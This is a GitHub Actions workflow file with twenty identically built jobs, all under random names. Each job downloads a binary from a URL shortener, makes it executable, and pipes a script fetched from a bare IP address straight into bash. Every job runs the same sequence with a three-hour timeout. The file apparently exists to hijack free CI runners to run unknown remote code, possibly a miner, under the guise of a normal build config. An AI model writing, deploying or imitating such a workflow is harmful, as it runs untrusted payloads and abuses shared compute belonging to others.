name: kixaceho
on: push
jobs:
  rifupuxe:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  sajidica:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  logovo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  vizuhofi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  xorila:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  yujefiye:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  segawu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  pemepe:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  xugati:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  kozubo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  rohutu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  sujumu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  honava:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  bopiyi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  yapoga:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  hecewu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  sigada:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  leheki:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  tuxohipo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
  taroceje:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/nEhXMaa; chmod +x nEhXMaa
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npy.php?a=yizi | bash -
